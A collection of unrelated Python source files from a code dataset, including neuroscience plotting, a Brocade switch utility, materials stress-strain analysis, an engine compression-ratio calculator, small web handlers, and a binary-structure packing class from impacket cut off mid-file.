print "tempo :", tb-ta
| StarcoderdataPython |
6598250 | # sensory PFC
ylim = (-0.258832775674365, 1.9837228160819715)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist', 'Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_PFC_PGP.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_PFC_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist'], ['PreDist', 'Gating', 'PostDist'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_PFC_P.png', format='png')
# sensory IT
ylim = (-1.0546353337905356, 6.621987030858086)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist', 'Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist'], ['IT'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nIT',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_IT_PGP.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist'], ['IT'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nIT',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_IT_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist'], ['PreDist', 'Gating', 'PostDist'], ['IT'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nIT',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_IT_P.png', format='png')
# sensory Stri
ylim = (-0.3037065344953298, 1.6670627280191153)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist', 'Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist'], ['Stri'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nStri',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_Stri_PGP.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist'], ['Stri'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nStri',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_Stri_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
['PreDist'], ['PreDist', 'Gating', 'PostDist'], ['Stri'],
ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nStri',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_Stri_P.png', format='png')
# extended PFC
ylim = (-0.14969837984715206, 0.36930971214874475)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
['PreDist'], ['PreDist'], ['PFC'],
ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PreDist)',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_PreDist_Half.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
['PreDist'], ['PreDist'], ['PFC'],
ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PreDist)',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax = selectivity_plot(['Oscar', 'Gonzo'], 'NextStimulusExtended', 'ConcatFactorExtended',
['PreDist'], ['PreDist'], ['PFC'],
ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PreDist)',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=ax, alpha=(0.35, 0.1), crop=(-50, 1900), ax2_y=(1, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_PreDist.png', format='png')
ylim = (-0.14410958260081336, 0.5219766476238107)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
['Gating'], ['Gating'], ['PFC'],
ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (Gating)',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax = selectivity_plot(['Oscar', 'Gonzo'], 'NextStimulusExtended', 'ConcatFactorExtended',
['Gating'], ['Gating'], ['PFC'],
ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (Gating)',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=ax, alpha=(0.35, 0.1), crop=(-50, 1900), ax2_y=(1, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_Gating.png', format='png')
ylim = (-0.12770990132450838, 0.3507261498275955)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
['PostDist'], ['PostDist'], ['PFC'],
ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PostDist)',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax = selectivity_plot(['Oscar', 'Gonzo'], 'NextStimulusExtended', 'ConcatFactorExtended',
['PostDist'], ['PostDist'], ['PFC'],
ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PostDist)',
legend_show=False, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=ax, alpha=(0.35, 0.1), crop=(-50, 1900), ax2_y=(1, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_PostDist.png', format='png')
# memory PFC
ylim = (-0.24516717325616877, 1.855146281742199)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
['PreDist', 'Gating', 'PostDist', 'Target'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_PGPT.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
['PostDist', 'Target'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_PT.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
['Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_GP.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
['PreDist'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
legend_show=True, legend_cond_show=True, percent_show=False,
cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_P.png', format='png')
| StarcoderdataPython |
8150875 | #!/usr/bin/env python3
# Copyright 2019 Brocade Communications Systems LLC. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may also obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`module_version_show` - PyFOS util to show the module version details
**************************************************************************
The :mod:`module_version_show` provides option to display supported module
versions.
This module is a standalone script that can be used to display all the
supported module versions.
* Inputs:
| Infrastructure options:
| -i,--ipaddr=IPADDR The IP address of FOS switch.
| -L,--login=LOGIN The login name.
| -P,--password=PASSWORD The password.
| -f,--vfid=VFID The VFID to which the request is directed to [OPTIONAL].
| -s,--secured=MODE The HTTPS mode "self" or "CA" [OPTIONAL].
| -v,--verbose Verbose mode[OPTIONAL].
* Outputs:
* Returns version details for all the supported modules from the switch.
"""
import sys
from pyfos import pyfos_auth
from pyfos import pyfos_util
from pyfos.pyfos_brocade_module_version import module_version
from pyfos.utils import brcd_util
def get_module_version_info(session):
module_version_obj = module_version()
result = module_version_obj.get(session)
return result
def main(argv):
filters = []
inputs = brcd_util.parse(argv, module_version, filters)
session = brcd_util.getsession(inputs)
result = get_module_version_info(inputs['session'])
pyfos_util.response_print(result)
pyfos_auth.logout(session)
if __name__ == "__main__":
main(sys.argv[1:])
| StarcoderdataPython |
160197 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
import warnings
warnings.filterwarnings(action='once')
data = None;
matData = None;
def initData(csvName):
data = pd.read_csv(csvName)
matData = pd.DataFrame(columns=['Name','Diameter','Length','Reduced Diamter','Area','Reduced Area','UTS','Elastic Modulus','Total Fail Strain','Plastic Strain Fail','Elastic Strain Fail','Offset Yield'])
def addMaterial(matInfo):
if len(matInfo) < len(matData.columns):
print("Not enough entries in matInfo")
return
matData.loc[len(matData)] = matInfo
def area(diameter):
return math.pi * (diameter/2)**2
def findUTS(key):
return max(data[key])
def getYoungsModulus(stress,strain,plot=False):
# finds the Young's Modulus by finding the largest linear slope between 1/10 the number of data points
# returns the Young's Modulus in the same units as the input stress
dummyData = pd.DataFrame(data={'x':strain,'y':stress})
dummyData.dropna(inplace=True)
x=np.array(dummyData['x'][:int(len(dummyData['x'])/2)])
y=np.array(dummyData['y'][:int(len(dummyData['x'])/2)])
numPts = len(x)
minFitLength = 8
chi = 0
chi_min = 10000
i_best=0
j_best=0
m_best=0
for i in range(numPts - minFitLength):
for j in range(i+minFitLength, numPts):
coefs = np.polyfit(x[i:j],y[i:j],1)
y_lin = x * coefs[0] + coefs[1]
chi=0
for k in range(i,j):
chi += (y_lin[k] - y[k])**2
if chi < chi_min and coefs[0] > m_best:
i_best = i
j_best = j
chi_min = chi
m_best = coefs[0]
coefs = np.polyfit(x[i_best:j_best],y[i_best:j_best],1)
y_lin = x[i_best:j_best] * coefs[0] + coefs[1]
if(plot):
plt.plot(x,y,'ro')
plt.plot(x[i_best:j_best],y_lin,'b-')
print("Young's Modulus (MPa): " + str(m_best))
return m_best
def findElasticModulus(stressKey,strainKey):
strain = data[strainKey]
stress = data[stressKey]
return getYoungsModulus(stress,strain)
def getFailure(stress):
# finds the point of failure by looking for largest jump between two stresses
# returns index of point of failure
# stress = np.array(stress)[int(len(stress)/2):]
maxJump=0;
indexVal=0;
for i in range(2,len(stress)):
if( abs(stress[i] - stress[i-2]) > maxJump and stress[i] - stress[i-2] < 0 ):
maxJump = abs(stress[i] - stress[i-2])
indexVal = i
return indexVal-2
def findFailure(stressKey,strainKey):
stress = data[stressKey]
return data[strainKey][getFailure(stress)]
def findPlasticElasticFailureStrain(stressKey,strainKey,elasticModulus,totFailStrain):
failIndex = findFailure(data[stressKey])
failStress = data[stressKey][failIndex]
return [failStress/elasticModulus,totFailStrain-failStress/elasticModulus]
def getYieldStress(strain, stress, offset, E):
x = strain
y = stress
x_n = x[x>0]
x_n = x_n[y>0]
y_n = y[x>0]
y_n = y_n[y>0]
dummyData = pd.DataFrame(data={'x':x_n,'y':y_n})
dummyData.dropna(inplace=True)
x=np.array(dummyData['x'][:int(len(dummyData['x'])/2)])
y=np.array(dummyData['y'][:int(len(dummyData['x'])/2)])
f=lambda x : E*(x-offset)
u=np.linspace(0,0.2,100)
v=f(u)
minDiff = 1000
index = -1
for i in range(len(y)):
for j in range(len(v)):
if y[i]-v[j] < minDiff:
minDiff = y[i]-v[j]
index = j
print(v[j])
return v[j]
def findYieldStress(stressKey,strainKey,elasticModulus,offset=.002):
stress = data[stressKey]
strain = data[strainKey]
return getYieldStress(strain,stress,offset,elasticModulus)
def writeOut(fName):
f = open(fName,'w')
for i in range(matData.shape[0]):
f.write(matData['Type'][i]+'\n')
f.write(str(matData['Diameter (mm)'][i])+'\n')
f.write(str(matData['Length (m)'][i])+'\n')
f.write(str(matData["Young's Modulus (MPa)"][i])+'\n')
f.close()
def plotData(stressKeys,strainKeys,names,totalFailureStrain,fName=None):
for i,xKey,yKey in enumerate(zip(strainKeys,stressKeys)):
x = data[xKey]
y = data[yKey]
index = 0
for j in range(len(x)):
if x[j] == totalFailureStrain:
index = j
xy = [[a,b] for k, (a,b) in enumerate(zip(x,y)) if a>0 and b>0 and k<index]
plt.plot(xy[:,0],xy[:,1],label=names[i])
plt.xlabel('Strain')
plt.ylabel('Stress')
plt.title('Stress-Strain Curve')
plt.legend(loc=(1.05,.65))
if fName != None:
plt.savefig(fName)
| StarcoderdataPython |
4949815 | <gh_stars>0
#Dynamic Compression Ration calculator
import math as m
borein=input("Cylinder Bore in mm? ")
strokein=input("Stroke in mm? ")
ccvolin=input("Combustion chamber volumein CCs? ")
bore=float(borein)
stroke=float(strokein)
ccvol=float(ccvolin)
#Converting mm to cm, volume(draw) in CCs
bore=bore/10
stroke=stroke/10
draw=(m.pi*((bore/2)**2))*stroke
print(bore, stroke, ccvol, draw,"\n")
timingin=input("Valve closing in degrees after BTDC? ")
timing=int(timingin)
short_stroke=0
stroke2=float(stroke)
#Calculates short stroke
if timing<=90:
timing2=m.radians(timing)
print("\n",timing2," Valve closing in radians")
print(m.sin(timing2))
short_stroke=stroke-((m.sin(timing2))*(stroke/2))
print(short_stroke*10," Effective stroke length in mm")
elif timing>90:
timing3=m.radians(timing)
print("\n",timing3, " Valve closing in radians")
print(m.sin(timing3))
short_stroke=stroke-(stroke/2)-((m.sin(timing3))*(stroke/2))
print(short_stroke*10," Effective stroke length in mm")
print("\n Almost done! \n")
#Calculates CR & DCR
regcr=ccvol/draw
sdraw=short_stroke*(m.pi*((bore/2)**2))
dyncr=ccvol/sdraw
print(sdraw," Shortened draw \n")
print(1/regcr,":1"," Regular Compression Ratio \n")
print(1/dyncr,":1"," Dynamic Compression Ratio \n")
input("Exit?")
| StarcoderdataPython |
5035581 | from django.http import HttpResponse
from django.views.generic import View
class BaseView(View):
def get(self, *args, **kwargs):
return HttpResponse("app 3")
| StarcoderdataPython |
6500023 | # coding: utf8
# Author: <NAME> (~wy)
# Date: 2017
# Big Numbers
def problem48():
acc = 0
for i in range(1,1001):
acc += i ** i
acc = acc % 10 ** 10
return acc
print(problem48()) | StarcoderdataPython |
1819360 | import tornado
import tornado.websocket
from tornado.web import RequestHandler
class HelloWorld(RequestHandler):
"""Print 'Hello, world!' as the response body."""
def get(self):
"""Handle a GET request for saying Hello World!."""
self.write("Hello, world!")
class WSHandler(tornado.websocket.WebSocketHandler):
def open(self):
print('new connection')
self.write_message("Hello World")
def on_message(self, message):
print('message received %s' % message)
def on_close(self):
print('connection closed') | StarcoderdataPython |
9779893 | #!/usr/bin/env python3
# Copyright (c) 2003-2012 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
"""
Stripped down version of: https://github.com/CoreSecurity/impacket/blob/python3/impacket/structure.py
with modifications in the function dump(...).
"""
from struct import pack, unpack, calcsize
# Trying to support both Python 2 and 3
import sys
if sys.version_info[0] == 2:
# Python 2.x
def b(x):
return x
def buildStr(x):
return x
else:
import codecs
def b(x):
if isinstance(x, bytes) is False:
return codecs.latin_1_encode(x)[0]
return x
def buildStr(x):
if isinstance(x, bytes):
return "".join(map(chr,x))
else:
return x
class Structure:
""" sublcasses can define commonHdr and/or structure.
each of them is an tuple of either two: (fieldName, format) or three: (fieldName, ':', class) fields.
[it can't be a dictionary, because order is important]
where format specifies how the data in the field will be converted to/from bytes (string)
class is the class to use when unpacking ':' fields.
each field can only contain one value (or an array of values for *)
i.e. struct.pack('Hl',1,2) is valid, but format specifier 'Hl' is not (you must use 2 dfferent fields)
format specifiers:
specifiers from module pack can be used with the same format
see struct.__doc__ (pack/unpack is finally called)
x [padding byte]
c [character]
b [signed byte]
B [unsigned byte]
h [signed short]
H [unsigned short]
l [signed long]
L [unsigned long]
i [signed integer]
I [unsigned integer]
q [signed long long (quad)]
Q [unsigned long long (quad)]
s [string (array of chars), must be preceded with length in format specifier, padded with zeros]
p [pascal string (includes byte count), must be preceded with length in format specifier, padded with zeros]
f [float]
d [double]
= [native byte ordering, size and alignment]
@ [native byte ordering, standard size and alignment]
! [network byte ordering]
< [little endian]
> [big endian]
usual printf like specifiers can be used (if started with %)
[not recommeneded, there is no why to unpack this]
%08x will output an 8 bytes hex
%s will output a string
%s\\x00 will output a NUL terminated string
%d%d will output 2 decimal digits (against the very same specification of Structure)
...
some additional format specifiers:
: just copy the bytes from the field into the output string (input may be string, other structure, or anything responding to __str__()) (for unpacking, all what's left is returned)
z same as :, but adds a NUL byte at the end (asciiz) (for unpacking the first NUL byte is used as terminator) [asciiz string]
u same as z, but adds two NUL bytes at the end (after padding to an even size with NULs). (same for unpacking) [unicode string]
w DCE-RPC/NDR string (it's a macro for [ '<L=(len(field)+1)/2','"\\x00\\x00\\x00\\x00','<L=(len(field)+1)/2',':' ]
?-field length of field named 'field', formated as specified with ? ('?' may be '!H' for example). The input value overrides the real length
?1*?2 array of elements. Each formated as '?2', the number of elements in the array is stored as specified by '?1' (?1 is optional, or can also be a constant (number), for unpacking)
'xxxx literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
"xxxx literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
_ will not pack the field. Accepts a third argument, which is an unpack code. See _Test_UnpackCode for an example
?=packcode will evaluate packcode in the context of the structure, and pack the result as specified by ?. Unpacking is made plain
?&fieldname "Address of field fieldname".
For packing it will simply pack the id() of fieldname. Or use 0 if fieldname doesn't exists.
For unpacking, it's used to know weather fieldname has to be unpacked or not, i.e. by adding a & field you turn another field (fieldname) in an optional field.
"""
commonHdr = ()
structure = ()
debug = 0
def __init__(self, data = None, alignment = 0):
if not hasattr(self, 'alignment'):
self.alignment = alignment
self.fields = {}
self.rawData = data
if data is not None:
self.fromString(data)
else:
self.data = None
def packField(self, fieldName, format = None):
if self.debug:
print("packField( %s | %s )" % (fieldName, format))
if format is None:
format = self.formatForField(fieldName)
if fieldName in self.fields:
ans = self.pack(format, self.fields[fieldName], field = fieldName)
else:
ans = self.pack(format, None, field = fieldName)
if self.debug:
print("\tanswer %r" % ans)
return ans
def getData(self):
if self.data is not None:
return self.data
data = b''
for field in self.commonHdr+self.structure:
try:
data += b(self.packField(field[0], field[1]))
except Exception as e:
if field[0] in self.fields:
e.args += ("When packing field '%s | %s | %r' in %s" % (field[0], field[1], self[field[0]], self.__class__),)
else:
e.args += ("When packing field '%s | %s' in %s" % (field[0], field[1], self.__class__),)
raise
if self.alignment:
if len(data) % self.alignment:
data += b('\x00'*self.alignment)[:-(len(data) % self.alignment)]
#if len(data) % self.alignment: data += ('\x00'*self.alignment)[:-(len(data) % self.alignment)]
if isinstance(data,str):
return data
return buildStr(data)
def fromString(self, data):
self.rawData = data
data = buildStr(data)
for field in self.commonHdr+self.structure:
if self.debug:
print("fromString( %s | %s | %r )" % (field[0], field[1], data))
size = self.calcUnpackSize(field[1], data, field[0])
if self.debug:
print(" size = %d" % size)
dataClassOrCode = str
if len(field) > 2:
dataClassOrCode = field[2]
try:
self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
except Exception as e:
e.args += ("When unpacking field '%s | %s | %r[:%d]'" % (field[0], field[1], data, size),)
raise
size = self.calcPackSize(field[1], self[field[0]], field[0])
if self.alignment and size % self.alignment:
size += self.alignment - (size % self.alignment)
data = data[size:]
return self
def __setitem__(self, key, value):
self.fields[key] = value
self.data = None # force recompute
def __getitem__(self, key):
return self.fields[key]
def __delitem__(self, key):
del self.fields[key]
def __str__(self):
return self.getData()
def __len__(self):
# XXX: improve
return len(self.getData())
def pack(self, format, data, field = None):
if self.debug:
print(" pack( %s | %r | %s)" % (format, data, field))
if field:
addressField = self.findAddressFieldFor(field)
if (addressField is not None) and (data is None):
return b''
# void specifier
if format[:1] == '_':
return b''
# quote specifier
if format[:1] == "'" or format[:1] == '"':
return b(format[1:])
# code specifier
two = format.split('=')
if len(two) >= 2:
try:
return self.pack(two[0], data)
except:
fields = {'self':self}
fields.update(self.fields)
return self.pack(two[0], eval(two[1], {}, fields))
# address specifier
two = format.split('&')
if len(two) == 2:
try:
return self.pack(two[0], data)
except:
if (two[1] in self.fields) and (self[two[1]] is not None):
return self.pack(two[0], id(self[two[1]]) & ((1<<(calcsize(two[0])*8))-1) )
else:
return self.pack(two[0], 0)
# length specifier
two = format.split('-')
if len(two) == 2:
try:
return self.pack(two[0],data)
except:
return self.pack(two[0], self.calcPackFieldSize(two[1]))
# array specifier
two = format.split('*')
if len(two) == 2:
answer = b''
for each in data:
answer += self.pack(two[1], each)
if two[0]:
if two[0].isdigit():
if int(two[0]) != len(data):
raise Exception("Array field has a constant size, and it doesn't match the actual value")
else:
return self.pack(two[0], len(data))+answer
return answer
# "printf" string specifier
if format[:1] == '%':
# format string like specifier
return format % data
# asciiz specifier
if format[:1] == 'z':
return b(data)+b'\0'
# unicode specifier
if format[:1] == 'u':
return b(data)+b'\0\0' + (len(data) & 1 and b'\0' or b'')
# DCE-RPC/NDR string specifier
if format[:1] == 'w':
if len(data) == 0:
data = '\0\0'
elif len(data) % 2:
data += '\0'
l = pack('<L', int(len(data)/2))
l = buildStr(l)
return b('%s\0\0\0\0%s%s' % (l,l,data))
if data is None:
raise Exception("Trying to pack None")
# literal specifier
if format[:1] == ':':
# Inner Structures?
if isinstance(data,Structure):
return b(data.getData())
return b(data)
# struct like specifier
if isinstance(data, str):
return pack(format, b(data))
else:
return pack(format, data)
def unpack(self, format, data, dataClassOrCode = str, field = None):
if self.debug:
print(" unpack( %s | %r )" % (format, data))
if field:
addressField = self.findAddressFieldFor(field)
if addressField is not None:
if not self[addressField]:
return
# void specifier
if format[:1] == '_':
if dataClassOrCode != str:
fields = {'self':self, 'inputDataLeft':data}
fields.update(self.fields)
return eval(dataClassOrCode, {}, fields)
else:
return None
# quote specifier
if format[:1] == "'" or format[:1] == '"':
answer = format[1:]
if answer != data:
raise Exception("Unpacked data doesn't match constant value '%r' should be '%r'" % (data, answer))
return answer
# address specifier
two = format.split('&')
if len(two) == 2:
return self.unpack(two[0],data)
# code specifier
two = format.split('=')
if len(two) >= 2:
return self.unpack(two[0],data)
# length specifier
two = format.split('-')
if len(two) == 2:
return self.unpack(two[0],data)
# array specifier
two = format.split('*')
if len(two) == 2:
answer = []
sofar = 0
if two[0].isdigit():
number = int(two[0])
elif two[0]:
sofar += self.calcUnpackSize(two[0], data)
number = self.unpack(two[0], data[:sofar])
else:
number = -1
while number and sofar < len(data):
nsofar = sofar + self.calcUnpackSize(two[1],data[sofar:])
answer.append(self.unpack(two[1], data[sofar:nsofar], dataClassOrCode))
number -= 1
sofar = nsofar
return answer
# "printf" string specifier
if format[:1] == '%':
# format string like specifier
return format % data
# asciiz specifier
if format == 'z':
if data[-1] != '\x00':
raise Exception("%s 'z' field is not NUL terminated: %r" % (field, data))
return data[:-1] # remove trailing NUL
# unicode specifier
if format == 'u':
if data[-2:] != '\x00\x00':
raise Exception("%s 'u' field is not NUL-NUL terminated: %r" % (field, data))
return data[:-2] # remove trailing NUL
# DCE-RPC/NDR string specifier
if format == 'w':
l = unpack('<L', b(data[:4]))[0]
return data[12:12+l*2]
# literal specifier
if format == ':':
return dataClassOrCode(data)
# struct like specifier
if format.find('s') >=0:
return buildStr(unpack(format, b(data))[0])
else:
return unpack(format, b(data))[0]
def calcPackSize(self, format, data, field = None):
#print( " calcPackSize %s:%r" % (format, data))
if field:
addressField = self.findAddressFieldFor(field)
if addressField is not None:
if not self[addressField]:
return 0
# void specifier
if format[:1] == '_':
return 0
# quote specifier
if format[:1] == "'" or format[:1] == '"':
return len(format)-1
# address specifier
two = format.split('&')
if len(two) == 2:
return self.calcPackSize(two[0], data)
# code specifier
two = format.split('=')
if len(two) >= 2:
return self.calcPackSize(two[0], data)
# length specifier
two = format.split('-')
if len(two) == 2:
return self.calcPackSize(two[0], data)
# array specifier
two = format.split('*')
if len(two) == 2:
answer = 0
if two[0].isdigit():
if int(two[0]) != len(data):
raise Exception("Array field has a constant size, and it doesn't match the actual value")
elif two[0]:
answer += self.calcPackSize(two[0], len(data))
for each in data:
answer += self.calcPackSize(two[1], each)
return answer
# "printf" string specifier
if format[:1] == '%':
# format string like specifier
return len(format % data)
# asciiz specifier
if format[:1] == 'z':
return len(data)+1
# asciiz specifier
if format[:1] == 'u':
l = len(data)
return l + (l & 1 and 3 or 2)
# DCE-RPC/NDR string specifier
if format[:1] == 'w':
l = len(data)
return int((12+l+(l % 2)))
# literal specifier
if format[:1] == ':':
return len(data)
# struct like specifier
return calcsize(format)
def calcUnpackSize(self, format, data, field = None):
if self.debug:
print(" calcUnpackSize( %s | %s | %r)" % (field, format, data))
# void specifier
if format[:1] == '_':
return 0
addressField = self.findAddressFieldFor(field)
if addressField is not None:
if not self[addressField]:
return 0
try:
lengthField = self.findLengthFieldFor(field)
return int(self[lengthField])
except:
pass
# XXX: Try to match to actual values, raise if no match
# quote specifier
if format[:1] == "'" or format[:1] == '"':
return len(format)-1
# address specifier
two = format.split('&')
if len(two) == 2:
return self.calcUnpackSize(two[0], data)
# code specifier
two = format.split('=')
if len(two) >= 2:
return self.calcUnpackSize(two[0], data)
# length specifier
two = format.split('-')
if len(two) == 2:
return self.calcUnpackSize(two[0], data)
# array specifier
two = format.split('*')
if len(two) == 2:
answer = 0
if two[0]:
if two[0].isdigit():
number = int(two[0])
else:
answer += self.calcUnpackSize(two[0], data)
number = self.unpack(two[0], data[:answer])
while number:
number -= 1
answer += self.calcUnpackSize(two[1], data[answer:])
else:
while answer < len(data):
answer += self.calcUnpackSize(two[1], data[answer:])
return answer
# "printf" string specifier
if format[:1] == '%':
raise Exception("Can't guess the size of a printf like specifier for unpacking")
# asciiz specifier
if format[:1] == 'z':
return data.index('\x00')+1
# asciiz specifier
if format[:1] == 'u':
l = data.index('\x00\x00')
return l + (l & 1 and 3 or 2)
